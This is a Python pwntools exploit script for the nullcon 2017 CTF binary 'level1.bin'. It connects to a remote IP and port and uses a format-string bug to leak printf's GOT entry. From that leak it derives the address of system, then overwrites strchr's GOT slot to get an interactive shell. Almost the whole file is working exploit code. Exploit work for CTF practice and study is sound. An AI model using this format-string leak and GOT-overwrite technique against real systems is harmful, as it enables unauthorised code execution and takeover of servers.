exploit for level1.bin (nullcon 2017)
#!/usr/bin/python | |
# exploit for level1.bin (nullcon 2017) | |
from pwn import * | |
def add_book(p):
    """Walk menu option 1 ("add book") on tube *p* with throwaway values.

    The entry itself is irrelevant; the script only needs one book to exist
    before the later query is issued.
    """
    # (prompt to wait for, answer) pairs; ``None`` means send without waiting.
    dialogue = (
        (None, '1'),
        ('Enter book name: ', 'a'),
        ('Enter book id: ', '1'),
    )
    for prompt, answer in dialogue:
        if prompt is not None:
            p.recvuntil(prompt)
        p.sendline(answer)
def leak_addr(p, addr):
    """Return the 32-bit little-endian value stored at *addr* in the target.

    Menu option 3 echoes the query back; the query here is the packed
    address followed by ``%11$s``, so the bytes at *addr* appear in the
    echoed line.  The four leaked bytes are read from fixed offset 20..24
    of that line (presumably past a constant prefix the service prints —
    verify against the binary if the offset ever drifts).
    """
    # Packed target address first, then the positional %s that reads it.
    query = p32(addr) + "%11$s"
    p.sendline('3')
    p.recvuntil('Enter query: ')
    p.sendline(query)
    echoed = p.recvline().strip()
    leaked = echoed[20:24]
    return u32(leaked)
if __name__ == '__main__':
    # Remote target only; the local-process variant is kept for reference.
    #p = process('./level1.bin', stdin=process.PTY)
    p = remote('34.198.96.6', 9001)

    # One book must exist before the query path is used.
    p.recvuntil('Enter choice: ')
    add_book(p)
    p.recvuntil('Enter choice: ')

    # Addresses in the binary and the libc offsets used for the arithmetic.
    printf_got, strchr_got = 0x804b014, 0x804b030
    printf_offset, system_offset = 0x0004cdd0, 0x0003fe70

    # Leak printf's resolved address, then derive system from the two offsets.
    printf = leak_addr(p, printf_got)
    system = printf - printf_offset + system_offset
    log.info("printf @ %#x" % printf)
    log.info("system @ %#x" % system)

    # NOTE(review): the format-string write below assumes strchr's GOT slot is
    # writable on the target (i.e. no full RELRO); that cannot be confirmed
    # from this script alone.  The leading "/bin/sh # " is presumably what the
    # service later passes to strchr — verify against the binary.
    payload = "/bin/sh # " + fmtstr_payload(14, {strchr_got: system}, numbwritten=12)
    p.sendline('3')
    p.recvuntil('Enter query: ')
    p.sendline(payload)
    p.interactive()